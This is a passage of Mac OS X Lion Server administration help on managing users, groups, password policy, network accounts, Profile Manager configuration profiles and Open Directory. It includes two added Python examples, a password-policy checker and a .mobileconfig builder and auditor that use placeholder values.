  In the Full Name field, enter the user's name. The name can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces.
Choose whether the user is a server administrator
  Select or deselect Allow user to administer this server.
Choose where the user's home folder is located
  Choose a folder from the Home Folder pop-up menu. The Home Folder pop-up menu appears if your server has file sharing turned on and at least one share point enables home folders.
Add the user to a group
  Click Add (+) and then enter the name of a group in the server's directory. The name autocompletes as you type. Select a group name to add the user to the group. If the name doesn't autocomplete, make sure you spelled the group name correctly. You can add users to groups on your server, but you can't add users to groups in directory domains you're connected to.
Remove a user from a group
  Select a group and then click Remove (-). All user accounts on your server are included in the Workgroup group. Don't remove users from this group.
Change the user's picture
  Click the silhouette or the existing user picture and select a standard picture, or click Edit Picture for a customized picture. When you click Edit Picture, you can take a picture with your computer's camera or choose a graphic file on your computer. After taking or choosing a picture, you can drag the picture to pan it or use the slider to zoom it. When you finish customizing the picture, click Set.

3. Click Done to save your changes to the user account.

Change advanced user account settings

1. In the Users pane of the Server app, Control-click a user account and choose Advanced Options. The following settings are available:

Setting         Description
User ID         This numerical ID is used for folder and file permissions.
Group           This is the UNIX group the user belongs to. Typically, this should be the "staff" group.
Account Name    This is the user's account name.
Aliases         These are other account names the user can use to log in.
Login Shell     This is the user's UNIX shell. By default, this is /bin/bash.
Home Directory  This is the location of the user's home folder.

2. If you change settings, click OK.

RELATED TOPICS

Reset a user's password
Enable shared home folders
Control a user's access to services
Change a user's or group's name
Change a user's or group's picture
Create a user account
Import users from another network account server

Choose a user's home folder location


When you give a user a home folder on your server, the user can log in to their computer using the account information stored on the server. Because the user's home folder is on the server, files they save are stored on the server.

1. If you haven't done so, set up your server to host network accounts. For information, see Host network accounts.
2. Enable a shared home folder if you haven't done so. For information, see Enable shared home directory folders.
3. In the Users pane of the Server app, double-click a user account.
4. Choose a folder from the Home Folder pop-up menu and then click Done. If the Home Folder pop-up menu doesn't appear, you don't have a shared home folder enabled. If you choose Local Only, the user won't have a home folder on the server and can't log in using the account information stored on the server.

Control a user's access to services


Use the Server app to control users' access to services. You can restrict users' access to services listed in the Server app except Web and Wiki services. Web and Wiki services have more customizable access control. For websites, you can limit access on a per-site level. For example, if your server is hosting two websites, www.example1.com and www.example2.com, you can give users access to www.example1.com but not to www.example2.com. Wikis have their own access controls, so you can restrict who's allowed to create wikis. When you create a wiki, you can designate others as administrators. Wiki administrators can choose who has access to the wiki and whether they can read and write or just read wiki content.

1. In the Server app, click Users.
2. Control-click the user and choose Edit Access to Services.
3. In the dialog that appears, select the checkboxes for services you want the user to access, then click OK.

RELATED TOPICS

Publish a website

Choose group services

Reset a user's password


In the Server app, you can reset the passwords of user accounts in your server's directory domain, but you can't reset the passwords of imported user accounts. A user can use System Preferences to change his or her password.

1. In the Users pane of the Server app, Control-click a user and then choose Reset Password.
2. Enter the user's new password in the New Password and Verify fields and then click Change Password. You can use Password Assistant to help you choose a password. Click the button next to the New Password field to see how secure the password is. The user can change this password in the Users & Groups pane of System Preferences on the user's computer.

RELATED TOPICS

Change a user's account settings
Set the global password policy

Set the global password policy


In the Server app, you can set a global password policy that's applied to all non-admin users. Changes take effect the next time users log in. There are two types of policies: disabling login when specific conditions are met, and password restrictions.

The server enforces password policies for users. For example, a user's password policy can specify a password expiration interval. If the user tries to log in and the server determines that the user's password has expired, the user must replace the expired password, and then the user can log in.

Password policies can disable a user account on a specified date, after a number of days, after a period of inactivity, or after a number of failed login attempts. Password policies can also require passwords to be a minimum length, contain at least one letter, contain at least one numeral, differ from the account name, differ from recent passwords, or be changed periodically.

Password policies don't affect administrator accounts. Administrators are exempt from password policies, because they can change these policies, and because enforcing password policies on administrators could subject them to denial-of-service attacks.

1. In the Users pane of the Server app, choose Edit Global Password Policy from the Action pop-up menu.
2. Select the options to enable and then click OK.
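The policy options above are enforced by the server itself; the following checker is an added example that spells out what each restriction means and how the failed-login lockout behaves, so you can see the effect of a setting before turning it on. It is not the manual's code and not the server's enforcement logic. The policy values are constructed, and recent passwords are compared as SHA-256 digests so the history never holds plaintext (the server keeps its own history in its password database).

```python
"""What the global password policy's restrictions mean, as a checker.

Added example, not the manual's code and not how the server enforces the
policy. Illustrates the listed restrictions (minimum length, at least one
letter, at least one numeral, differ from the account name, differ from
recent passwords), the administrator exemption, and the lockout after a
number of failed login attempts. Policy values are constructed.
"""
import hashlib
import re

POLICY = {
    "min_length": 8,
    "require_letter": True,
    "require_numeral": True,
    "differ_from_account_name": True,
    "history_depth": 3,       # previous passwords a new one must differ from
    "max_failed_logins": 5,   # failures before the account is disabled
}


def digest(password: str) -> str:
    """Digest used to compare against the password history without storing plaintext."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def password_violations(candidate, account_name, recent_digests=(), is_admin=False, policy=POLICY):
    """Names of the rules the candidate breaks; empty when it complies.

    Administrators are exempt, as the manual states, so they get an empty list.
    """
    if is_admin:
        return []
    failures = []
    if len(candidate) < policy["min_length"]:
        failures.append("minimum length")
    if policy["require_letter"] and not re.search(r"[A-Za-z]", candidate):
        failures.append("at least one letter")
    if policy["require_numeral"] and not re.search(r"[0-9]", candidate):
        failures.append("at least one numeral")
    if policy["differ_from_account_name"] and candidate.lower() == account_name.lower():
        failures.append("differ from account name")
    if digest(candidate) in list(recent_digests)[:policy["history_depth"]]:
        failures.append("differ from recent passwords")
    return failures


class FailedLoginTracker:
    """Disables an account once it reaches policy['max_failed_logins'] consecutive failures."""

    def __init__(self, policy=POLICY):
        self.limit = policy["max_failed_logins"]
        self.failures = {}
        self.disabled = set()

    def record_failure(self, account) -> bool:
        """Count one failed attempt; return True when the account is now disabled."""
        self.failures[account] = self.failures.get(account, 0) + 1
        if self.failures[account] >= self.limit:
            self.disabled.add(account)
        return account in self.disabled

    def record_success(self, account):
        """A successful login resets the consecutive-failure count."""
        self.failures.pop(account, None)

    def is_disabled(self, account) -> bool:
        return account in self.disabled


if __name__ == "__main__":
    print(password_violations("hunter2", "jdoe"))        # ['minimum length']
    tracker = FailedLoginTracker()
    for _ in range(POLICY["max_failed_logins"]):
        locked = tracker.record_failure("jdoe")
    print(locked)                                        # True
```

The lockout counter is the part to think about before enabling the option: the manual notes that administrators are exempt precisely because an attacker who can trigger failed logins against an administrator account would otherwise be able to lock the administrators out.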

RELATED TOPIC

Reset a user's password

Wipe or lock user devices


If a user has a managed device, you can issue a remote wipe or lock command, and for iOS devices, reset their passcode. You can also use Profile Manager to remotely wipe or lock devices and to configure them.

1. In the Users pane of the Server app, double-click a user account.
2. Click Wipe or Lock next to a device.

If no devices are listed, the user doesn't have managed devices.

RELATED TOPIC

About configuration profiles

Host network accounts


You can host network accounts on your server, which gives users remote acces s to your servers services. If you dont host network accounts on your s erver, accounts you create on your s erver are local accounts. When you host network accounts on your server, you can create network accounts in the Server app, or create local accounts in System Preferences. Other s ervers can import network accounts hosted on your server. When another server imports an account from your s erver, a user with an imported account can use services from other servers but still us e the user name and pass word stored on your server. Accounts you create in Server app prior to s etting it up to host network accounts are local accounts. The following icons appear at the right of a user's or group's portrait to indicate whether the account is a local, network, or imported account:
Graphic                   Description
(none)                    Local account
(icon not reproduced)     Network account
(icon not reproduced)     Imported account

Hosting network accounts on your server is also known as setting up an Open Directory master.

1. In the Server app, choose Manage > Manage Network Accounts. If Manage Network Accounts isn't listed, your server already hosts network accounts.
2. In the assistant that appears, click Next.
3. In the Directory Administrator step, enter a name and password for the directory administrator account, then click Next. The directory administrator account can manage the network server and its services, and administer the computer. Choose a strong password.
4. In the Organization Information step, enter the name of your organization and a valid email address, then click Next. The information you provide is used to set up the certificate server.
5. In the Confirm Settings step, make sure the information you entered is correct, and then click Set Up.

RELATED TOPICS

About user accounts
Create a user account
Import users from another network account server
Import a group from another network account server

Lion Server user management

Manage users and groups

Work with groups

Create groups
You can create groups with the Server app.

1. In the Groups pane of the Server app, click the Add button (+).
2. In the Full Name field, enter the group name. The name can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces.
3. In the Group Name field, enter the group's short name. If you don't want to use the generated short name, enter a different short name. After the account is created, you can't change the short name. The short name is typically eight or fewer characters, but can be up to 255 Roman characters. Use only the characters a through z, A through Z, 0 through 9, . (period), _ (underscore), or - (hyphen).
4. To associate a picture with the group account, click the silhouette and select a standard picture, or click Edit Picture for a customized picture. When you click Edit Picture, you can take a picture with your computer's camera or choose a graphic file on your computer. After taking or choosing a picture, you can drag the picture to pan it or use the slider to zoom it. When you finish customizing the picture, click Set.
5. Click Done to create the group account.

RELATED TOPICS

Choose group services
Add or remove group members
Change a user's or group's name
Change a user's or group's picture
Delete a group


Delete a group
You can use the Server app to delete group accounts that are no longer needed.

1. In the Groups pane of the Server app, select a group.
2. Click the Delete button (–).

RELATED TOPIC

Create groups


Add or remove group members


In the Server app, you can create groups composed of users with accounts on your server's network account server (also known as a directory server), your server's local directory, or your organization's directory. If your server is connected to a network account server, your group members can include users and groups from the network account server. External members don't have user accounts on your server and can't access your server's services except for wiki service. They can access the group's shared folder and the wikis the group has permission to view.

Add a group member

1. In the Groups pane of the Server app, double-click a group name, or select a group and click Edit (pencil). The group's account information is shown.
2. Click Add (+) and then enter a user name or group name. The name autocompletes as you type. If the name doesn't autocomplete, make sure you spelled the name correctly. This looks up local and network account names, including those in the external network account server, if your server is connected to one.
3. Select a user name to add the user to the group.
4. Click Done to save your changes to the group account.

Add several group members

1. In the Groups pane of the Server app, double-click a group name, or select a group and click Edit (pencil). The group's account information is shown.
2. Click Add (+) and enter a user name.
3. Select Browse in the list that appears. A window listing all local and network users and groups appears. The list also includes users and groups in the external network account server, if your server is connected to one. If there are too many accounts to list in the window, you won't see accounts until you search for them.
4. Drag users and groups from the window to the Members list. To select a range of users and groups, hold down the Shift key while selecting them. To select or deselect individual entries, hold down the Command key while clicking.
5. Click Done to save changes to the group account.

Remove a group member

1. In the Groups pane of the Server app, double-click a group name, or select a group and click Edit (pencil). The group's account information is shown.
2. Select a group member and click Remove (–).
3. Click Done to save changes to the group account.

RELATED TOPICS

Change a user's group membership
Change a user's or group's name
Change a user's or group's picture
Choose group services
Create groups


Change a users group membership


It's easy to change which groups a user belongs to. By default, users belong to the Workgroup group. Don't remove users from this group, because you need a group that all users belong to.

1. In the Users pane of the Server app, double-click a user.
2. Do any of the following:
   To add a group, click the Add button (+) and then enter the name of the group. The name autocompletes as you type. If the name doesn't autocomplete, make sure you spelled the group's name correctly. This looks up local and network account names, including in the external network account server (also known as a directory server), if your server is connected to one.
   To remove a group, select the group and then click Remove (–).

RELATED TOPICS

Add or remove group members
Change a user's account settings


Change a users or groups name


You can change an account's full name, but you can't change its short name. Names can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces.

1. Do one of the following:
   To change a user's name, in the Users pane of the Server app, double-click a user.
   To change a group's name, in the Users pane of the Server app, double-click a group.
2. Edit the Full Name field and then click Done.

RELATED TOPICS

Change a user's account settings
Change a user's or group's picture
Reset a user's password
Choose group services


Change a users or groups picture


You can change the picture for users and groups. You can't change the picture for an imported account if the network account server (also known as a directory server) has a picture set for the account.

1. Do one of the following:
   To change a user's picture, in the Users pane of the Server app, double-click a user.
   To change a group's picture, in the Groups pane of the Server app, double-click a group.
2. Do one of the following:
   To use an included picture, click the picture area and choose a picture from the pop-up menu.
   To use a picture from your computer, find the picture in the Finder and drag the picture to the picture area.
3. To edit the picture, do any of the following:
   To replace the picture with a picture you've used recently: Click Recent Pictures, then click a picture.
   To replace the picture with a picture from your computer: Click Choose.
   To take a picture using a video camera attached to your computer: Click the camera button.
   To move the picture: Drag it up, down, or sideways.
   To crop the picture: Drag the slider.
   To apply a visual effect: Click the Visual Effects button (swirl), scroll through the available effects, and select the effect you want.

RELATED TOPICS

Change a user's or group's name
Change a user's account settings
Choose group services


Choose group services


You can enable group services that create a shared folder for the group, make group members iChat buddies, and create a wiki for the group. Shared folders are stored in /Groups/groupname/ on the server. Users can access them by connecting to afp://servername/Groups/groupname/. If your server runs iChat service, users have Jabber-based iChat accounts and you can make group members iChat buddies.

1. In the Groups pane of the Server app, double-click a group name, or select a group and click Edit (pencil). The group's account information is shown.
2. Enable or disable the following services:
   Give this group a shared folder: Select this option to create a shared folder for the group in /Groups/groupname/ on the server. When group members log in, they can access this folder by connecting to afp://servername/Groups/groupname/ in the Finder, and then upload files to it.
   Make group members iChat buddies: Select this option to include group members as iChat buddies. When group members open iChat, the server is included as an iChat server, and group members are included in the list.
   Create Group Wiki: Click this button to create a private wiki for the group. Group members can create and edit content in the wiki.

3. Click Done to save your changes.

RELATED TOPICS

Add or remove group members
Control a user's access to services
Make all group members iChat buddies
Set up a group file sharing folder


Make all group members iChat buddies


You can automatically make all members of a group iChat buddies. When group members open iChat, the server is included as an iChat server, and group members are included in the list.

1. In the Groups pane of the Server app, double-click a group.
2. Select Make group members iChat buddies.

RELATED TOPIC

Choose group services


Set up a group file sharing folder


You can set up a group file sharing folder. All members of the group have full access to the folder, including uploading, downloading, and deleting files.

Shared folders are stored in /Groups/groupname/ on the server.

1. In the Groups pane of the Server app, double-click a group.
2. Select Give this group a shared folder and then click Done. After the shared folder is created, you can click the arrow button next to the option to view the contents of the shared folder.

RELATED TOPICS

Add or remove group members
Choose group services
Control a user's access to services
Make all group members iChat buddies

Lion Server user management

Manage users and groups

Work with other network account servers

Connect to another network account server


You can connect your server to a network account server (also known as a directory server), which gives users on the network account server access to wiki service and group shared folders. Your server can connect to a Mac Open Directory server that has Mac OS X Lion Server or Mac OS X v10.6 Snow Leopard Server. If it has Snow Leopard Server, it must have v10.6.8 or later to authenticate users for your server's podcast service and wiki service. Your server can also connect to a Windows Active Directory server or to a third-party LDAP server. If your server connects to an LDAP server, you might need to use the Directory Utility app to change your server's LDAP server mappings. If your server is connected to a network account server, groups on your server can include users and groups from the network account server. People with user accounts on other network account servers don't have user accounts on your server and can't access your server's services except for wiki service. They can access the group's shared folder and wikis that the group has permission to view. If you import an account from another network account server, the imported account can access your server's services. You can also make an imported user an administrator for your server, a member of groups on your server, or give the user a home folder on your server.

1. In the Server app, choose Manage > Connect to Directory. If your server isn't set up to host network accounts, the "Configure Network Users and Groups" assistant appears. After you complete this assistant, the "Connect to Directory" assistant appears. For information about setting up your server to host network accounts, see Host network accounts.
2. Proceed through the assistant that appears; when the assistant asks you to enter the server address of the directory server that has the accounts to import, enter it and click Next.
3. If the dialog expands to show fields for Client Computer ID, User Name, and Password, enter the name and password of a user account on the directory server. For an Open Directory server, you can enter the name and password of a standard user account; you don't need to use a directory administrator account. Depending on the network account server settings, you might be able to connect without authentication by leaving these fields blank, although this is less secure. For an Active Directory server, you can enter the name and password of an Active Directory administrator account or a standard user account that has the Add workstations to domain privilege.
4. In the Confirm Settings step, make sure all settings are correct and then click Set Up.

When you connect to another network server, the Manage menu no longer lists Connect to Directory. When you create users or groups, you can now import accounts. Connect to your first network account server using the Server app, and connect to additional network account servers using System Preferences. You can also disconnect from network account servers using System Preferences. For information about joining network account servers in System Preferences, see System Preferences Help.

RELATED TOPICS

Import users from another network account server
Import a group from another network account server


Import users from another network account server


If your server connects to your organization's network account server, you can import users' existing accounts. Imported user accounts remain in your organization's network account server. Imported users have access to all services on your server. Accounts that aren't imported can't access those services, except for wiki service. You can also import groups, which imports all members of the group.

1. If your server is not set up to host network accounts, set it up to do so. When you're viewing the Server app, if the Manage > Manage Network Accounts option is listed, your server is not set up to host network accounts. For information about setting up your server to host network accounts, see Host network accounts.
2. In the Users pane of the Server app, click the Add button (+). A New User dialog appears.
3. From the Type pop-up menu, choose Imported user from directory. If you don't see the Type pop-up menu, your server isn't connected to a network account server in your organization. For information on connecting to a network account server, see Connect to another network account server. If your organization doesn't have a network account server (other than your server), you can't import users but you can create user accounts.
4. Type part or all of the user's name in the search field; then, when you see the name, select it and click Import.
5. When you finish importing user accounts, click Done.

Imported user accounts have a blue arrow in the lower-right corner of their user picture in the Users pane.

RELATED TOPICS

Connect to another network account server
About user accounts
Import a group from another network account server


Import a group from another network account server


If your server connects to your organization's network account server (also known as a directory server), you can import group accounts, which imports all group members' user accounts. Imported accounts can use all services on the server. External accounts that aren't imported can only use wiki service. Imported group accounts are synced. If people are added to or removed from the imported group on your organization's network account server, their imported user accounts gain or lose access to services on the server. You can add group members to the group, but you can't remove group members who you didn't add.

1. If your server is not set up to host network accounts, set it up to do so. When you're viewing the Server app, if the Manage > Manage Network Accounts option is listed, your server is not set up to host network accounts. For information about setting up your server to host network accounts, see Host network accounts.
2. In the Groups pane of the Server app, click the Add button (+). The New Group dialog appears.
3. From the Type pop-up menu, choose Imported group from directory. If you don't see the Type pop-up menu, your server isn't connected to a network account server in your organization. If your organization doesn't have a network account server (other than your server), you can't import groups but you can create group accounts.
4. Type part or all of the group name in the search field; then, when you see the name, select it and click Import.
5. When you finish importing user accounts, click Done.

Imported group accounts have a blue arrow in the lower-right corner of their group picture in the Groups pane.

RELATED TOPICS

Connect to another network account server
About user accounts
Import users from another network account server

Lion Server user management

Manage users and groups

View accounts in the Server app

Sort the list of users or groups


It's easy to sort the list of users or groups by name, account name, or ID. Name refers to the user's or group's full name, and account name refers to the user's or group's short name. The ID is assigned to users and groups when they're created. Recently created accounts typically have higher IDs than older accounts.

In the Users or Groups pane of the Server app, Control-click a user or group, choose Arrange By, and then choose an option.

RELATED TOPIC

Change a user's account settings


View system and administrator accounts


By default, the Users pane of the Server app lists all user accounts and the primary administrator account, but it doesn't list system accounts, the root account, or the directory administrator account. These accounts aren't listed because you shouldn't edit them, nor should you use them to log in on client computers.

In the Server app, choose View > Show System Accounts. If you're already showing system accounts, hide them by choosing View > Hide System Accounts.

RELATED TOPIC

About administrator accounts

Lion Server user management

Profile Manager

About Profile Manager


Profile Manager makes it easy to configure your users' Mac OS X Lion computers and iOS devices so they're set up to use your company or school resources and so they have the settings your organization requires.

Components of Profile Manager

Profile Manager consists of three parts that work together to let you specify how clients are configured, how to administer devices, and how to deliver the configurations to users and devices.

Web-based Administration Tool: The Profile Manager web app is where you configure settings for devices, manage enrolled devices and device groups, and execute or monitor tasks on enrolled devices.

Self-Service User Portal: Profile Manager's user portal is an easy-to-use, secure website for distributing settings you define using the administration tool. Users connect to the web-based portal using their device. Then, after they log in, the settings that you assigned to them are available for download and installation. Users also use this site to enroll devices for mobile device management, if you're using Profile Manager as a mobile device management server.

Mobile Device Management Server: Profile Manager also provides a mobile device management (MDM) server that lets you remotely manage enrolled Mac OS X Lion and iOS devices. After a device is enrolled with Profile Manager, you can update its configuration over the network without user interaction, as well as execute tasks such as reporting or locking and wiping the device.

Understanding user and device groups

Each user, user group, device, and device group can have a default group of settings. This allows you to easily share base settings for devices or people that need them. For example, to configure a teacher's iPad, create a user account for the teacher, then place that user in the "teachers" and "iPad" groups. This assigns them two collections of default settings, one from each group, and you can then create and assign additional settings that are tailored to the user. Other types of user and device groups that you might find useful are "lab Mac," "field sales iPhone," and "student notebooks." For the latter group, for example, the default settings might include restrictions or specific network settings.

Understanding configuration profiles

Behind the scenes, Profile Manager works by creating and distributing configuration profiles. Configuration profiles are XML files (.mobileconfig) that contain payloads that define groups of settings. When the profile is installed on a Mac OS X Lion or iOS device, the settings it defines are applied. Each user, device, and group has a default configuration profile so you can quickly provide a base level of settings; you can then assign additional configuration profiles to customize the settings to meet your organizational requirements. For example, to enforce restrictions and configure users' devices to use your VPN, create a configuration profile with a restrictions payload and a VPN payload. Because both payloads are in the same profile, the user must install both. If they remove the configuration profile to avoid the restrictions, their VPN access is also removed.

Distributing configuration profiles

After you define the settings for users and their devices, you can distribute the configuration profiles to users in the following ways:

Manual distribution: You can download configuration profiles (.mobileconfig files) from Profile Manager's administration tool, then send them to your users via email or post them to a website you create. When users receive or download the file, they can install it on their device.

User self-service: Users can download and install the settings from Profile Manager's built-in user portal. The user portal ensures that users receive the configuration profiles you assign to them or their group.

Remote device management: You can enable Profile Manager's mobile device management server, which allows you to remotely install, remove, and update configuration profiles on enrolled devices.

Managing a Mac lab

You can use Profile Manager to maintain a student laboratory of Macs, ensuring that they're configured identically. When you build the network system image for the lab, include configuration profiles that enroll the computers for remote device management by Profile Manager.

Managing policies on devices

In addition to general configuration settings, Profile Manager allows you to enforce organization policies. For example, you can specify passcode policies, define the types of networks devices can connect to, and enforce restrictions such as preventing the use of cameras on iOS devices. If you're managing the devices remotely, you can install updated policies without user action or notification.

Remotely locking or wiping a lost device

Devices that you remotely manage can be locked or wiped using Profile Manager's administration tool. For Mac OS X Lion devices, locking shuts down the computer and installs an EFI passcode so it cannot be started up without providing the passcode. On iOS devices, locking invokes the lock screen and enforces the passcode, if any, installed on the device.

Wiping a device removes all user data. On iOS devices, the device is restored to factory defaults. For iOS devices, you can also reset a user's passcode when they've forgotten it. This temporarily removes the device passcode (for 60 minutes). When the user unlocks the device, they are immediately required to enter a new passcode that meets the criteria specified by the configuration profiles installed on the device.


About configuration profiles


Configuration profiles are XML files that load settings and authorization information onto a Mac OS X Lion computer or an iOS device. They contain client security policies and restrictions, VPN configuration information, Wi-Fi settings, email and calendar accounts, authentication credentials that permit a computer to work with your enterprise systems, and several other types of settings. Some VPN and Wi-Fi settings, such as 802.1X parameters, can be set only by a configuration profile. You create configuration profiles using Profile Manager.

Each configuration profile contains one or more payloads. A payload is a collection of settings, such as VPN specifications, in the configuration profile. Some payloads are for use only with Mac OS X Lion computers, some are only for iOS devices, and some apply to both. When you create a configuration profile, you do so for users, devices, or groups of users and devices. Profile Manager tailors the available payloads depending on which you choose, and the settings apply at that level. For example, settings that apply only to users are not available when you're creating a device configuration profile.

Although you can create a single configuration profile that contains all payloads for your organization, consider creating separate profiles that let you enforce policies while granting access, as well as provide updates to settings that are subject to change. For example, you might create a configuration profile that sets up a user's access to email but also enforces restrictions or passcode settings. To have access to messages, users must also accept your security policies.

You can distribute configuration profiles by email, on your own webpage, or by using Profile Manager's built-in user portal. When users open the email attachment or download the profile using Safari on their device, they're prompted to begin installation. You can also use Profile Manager as a mobile device management server, which allows you to send new and updated profiles to users after they enroll their devices. Except for passwords, users generally can't change settings in a configuration profile. Accounts configured by a profile can only be removed by deleting the profile. On iOS devices, you can mark a profile as being locked to the device, so that once installed it can be removed only by wiping the device of all data (or by entering a passcode).
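The profile structure described here, together with the restrictions-plus-VPN coupling from About Profile Manager, as an added example (not Profile Manager's own code): it writes a .mobileconfig with Python's plistlib and audits one, checking that a profile granting VPN access also carries a passcode policy and is locked against removal. The payload types and keys are Apple's documented ones; the identifiers, host name and shared secret are constructed placeholders.

```python
"""Build and audit a Profile Manager style .mobileconfig (added example; the
payload types and keys follow Apple's configuration profile format, while the
identifiers, VPN host and shared secret are constructed placeholders)."""
import plistlib
import uuid

PASSCODE = "com.apple.mobiledevice.passwordpolicy"
RESTRICTIONS = "com.apple.applicationaccess"
VPN = "com.apple.vpn.managed"
COMMON_KEYS = ("PayloadType", "PayloadIdentifier", "PayloadUUID", "PayloadVersion")


def make_payload(payload_type, identifier, display_name, settings):
    """Every payload carries the same common keys plus its own settings."""
    payload = {
        "PayloadType": payload_type,
        "PayloadIdentifier": identifier,
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadVersion": 1,
        "PayloadDisplayName": display_name,
    }
    payload.update(settings)
    return payload


def build_profile(org, identifier, payloads, locked=True):
    """Top-level profile dict; PayloadContent holds the list of payloads."""
    return {
        "PayloadType": "Configuration",
        "PayloadVersion": 1,
        "PayloadIdentifier": identifier,
        "PayloadUUID": str(uuid.uuid4()).upper(),
        "PayloadDisplayName": f"{org} VPN access",
        "PayloadOrganization": org,
        # Locked profile: on iOS it can only be removed by wiping the device.
        "PayloadRemovalDisallowed": locked,
        "PayloadContent": payloads,
    }


def example_profile_bytes(include_passcode=True, locked=True):
    """Serialise a constructed profile that ties VPN access to device policy."""
    payloads = [
        make_payload(VPN, "com.example.vpn", "Corporate VPN", {
            "UserDefinedName": "Corporate VPN",
            "VPNType": "L2TP",
            "PPP": {"CommRemoteAddress": "vpn.example.com", "AuthName": "vpnuser"},
            # Placeholder value: a secret embedded in a profile is readable by
            # anyone who obtains the file, so distribute such profiles with care.
            "IPSec": {"AuthenticationMethod": "SharedSecret",
                      "SharedSecret": b"PLACEHOLDER-SECRET"},
        }),
        make_payload(RESTRICTIONS, "com.example.restrictions", "Restrictions",
                     {"allowCamera": False}),
    ]
    if include_passcode:
        payloads.append(make_payload(PASSCODE, "com.example.passcode", "Passcode", {
            "forcePIN": True, "minLength": 6, "requireAlphanumeric": True,
            "maxFailedAttempts": 10, "maxPINAgeInDays": 90, "pinHistory": 4,
        }))
    profile = build_profile("Example Org", "com.example.profile", payloads, locked)
    return plistlib.dumps(profile)   # XML plist, the .mobileconfig on-disk format


def audit_profile(data):
    """Parse a .mobileconfig and return a list of findings (empty means it passes)."""
    findings = []
    profile = plistlib.loads(data)
    payloads = profile.get("PayloadContent", [])
    types = [p.get("PayloadType") for p in payloads]
    uuids = [p.get("PayloadUUID") for p in payloads]
    for p in payloads:
        missing = [k for k in COMMON_KEYS if k not in p]
        if missing:
            findings.append(f"{p.get('PayloadIdentifier', '?')}: missing {missing}")
    if len(set(uuids)) != len(uuids):
        findings.append("duplicate PayloadUUID values")
    # Policy coupling: grant access (VPN) only alongside a passcode requirement,
    # and do not let the user drop the profile to escape the policy.
    if VPN in types and PASSCODE not in types:
        findings.append("VPN payload without a passcode policy payload")
    if VPN in types and not profile.get("PayloadRemovalDisallowed", False):
        findings.append("VPN profile is user-removable")
    return findings


def payload_types(data):
    """Convenience: the PayloadType of every payload in a serialised profile."""
    return [p.get("PayloadType") for p in plistlib.loads(data).get("PayloadContent", [])]
```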


Provide user configuration profiles


Use the Server app to start Profile Manager service. It provides administrators with a configuration profile editor, a user portal where users can download configuration profiles, and, optionally, a mobile device management server for automatic profile distribution and other management tasks.

1. Open Server, log in to a server, and in the Services list, click Profile Manager.
2. Click the On button. Wait a moment while Profile Manager service starts.
3. To send the URL of the Profile Manager server to a user so they can log in and download the configuration profiles you assigned to them, click User Portal, then copy the URL from the browser window that opens. For information about how users interact with Profile Manager, click Open Profile Manager and choose Help from the user menu.
4. To enable Profile Manager to act as a mobile device management server, click the Configure button in the Device Management section of the pane. For information about mobile device management, click Open Profile Manager and choose Help from the user menu.
5. To create configuration profiles and assign them to users, click Open Profile Manager.

When the Profile Manager web app opens in your web browser, log in with your administrator account.

Lion Server user management

Open Directory services

About Open Directory

Open Directory and directory services


A directory service provides a central repository for information about computer users and resources in an organization. Storing administrative data in a central repository has many benefits: It reduces data entry effort. It ensures that network services and clients have consistent information about users and resources. It simplifies administration of users and resources. It provides identification, authentication, and authorization information for other network services.

In education and enterprise environments, directory services are the ideal way to manage users and computing resources. Organizations with as few as 10 people can benefit by deploying a directory service. Directory services are doubly beneficial: they simplify system and network administration, and they simplify a user's experience on the network. With directory services, administrators can maintain information about all users, such as their names, passwords, and locations of network home directories, centrally, rather than on each computer. Directory services can also maintain centralized information about printers, computers, and other network resources. Centralizing information about users and resources can reduce the system administrator's information management burden, and each user has a centralized user account for logging in on any authorized computer on the network. With centralized directory service and file service set up to host network home folders, wherever a user logs in, the user gets the same home folder, personal desktop, and individual preferences. The user always has access to personal networked files and can easily locate and use authorized network resources.

Directory services and directory domains

A directory service acts as an intermediary between application and system software processes, which need information about users and resources, and the directory domains that store the information. As shown in the following illustration, Open Directory provides directory services for Macs and Mac servers.

Open Directory can access information in one or several directory domains. A directory domain stores information in a specialized database that is optimized to handle many requests for information and to find and retrieve information quickly. Processes running on Mac computers can use Open Directory services to save information in directory domains. For example, when you create a user account with Workgroup Manager, Open Directory stores the user name and other account information in a directory domain. You can then review user account information in Workgroup Manager, which uses Open Directory to retrieve the user information from a directory domain. Other application and system software processes can also use the user account information stored in directory domains. When someone attempts to log in to a Mac, the login process uses Open Directory services to validate the user name and password.


A historical perspective
Like Mac OS X Lion, Open Directory has a UNIX heritage. Open Directory provides access to administrative data that UNIX systems generally keep in configuration files, which require painstaking work to maintain. (Some UNIX systems still rely on configuration files.) Open Directory consolidates the data and distributes it for ease of access and maintenance.

Data consolidation
For years, UNIX systems have stored administrative information in a collection of files located in the /etc directory, as shown in the following illustration.

This scheme requires each UNIX computer to have its own set of files, and processes running on a UNIX computer read its files when they need administrative information. If you're experienced with UNIX, you probably know about the files in the /etc directory: group, hosts, hosts.equiv, master.passwd, and so forth. For example, a UNIX process that needs a user's password hash consults the /etc/master.passwd file, which contains a record for each user account. A UNIX process that needs group information consults the /etc/group file.

Open Directory consolidates administrative information, simplifying the interaction between processes and the administrative data they create and use:

Processes no longer need to know how and where administrative data is stored; Open Directory gets the data for them. If a process needs the location of a user's home folder, the process has Open Directory retrieve the information. Open Directory finds the requested information and returns it, insulating the process from the details of how the information is stored, as shown in the following illustration.

If you set up Open Directory to access administrative data from more than one directory domain, Open Directory consults the domains as needed.

Some data stored in a directory domain is identical to data stored in UNIX configuration files. For example, the home folder location, real name, user ID, and group ID are stored in user records of a directory domain instead of the standard /etc/passwd file. However, a directory domain stores much more data to support functions that are unique to Mac OS X Lion, such as support for managing Mac client computers.

Data distribution
A characteristic of UNIX configuration files is that the administrative data they contain is available only to the computer they are stored on. Each computer has its own UNIX configuration files. With UNIX configuration files, each computer that someone wants to use must have that person's user account settings stored on it, and each computer must store the account settings for every person who can use the computer. To set up a computer's network settings, the administrator must go to the computer and enter the IP address and other information that identifies the computer on the network. Similarly, when user or network information must be changed in UNIX configuration files, the administrator must make the changes on the computer where the files reside. Some changes, such as network settings, require the administrator to make the same changes on multiple computers. This approach becomes unwieldy as networks grow in size and complexity.

Open Directory solves this problem by letting you store administrative data in a directory domain that can be managed by a network administrator from one location. Open Directory lets you distribute the information so it is visible on the network to the computers that need it and to the administrator who manages it, as shown in the following illustration.


Uses of directory data


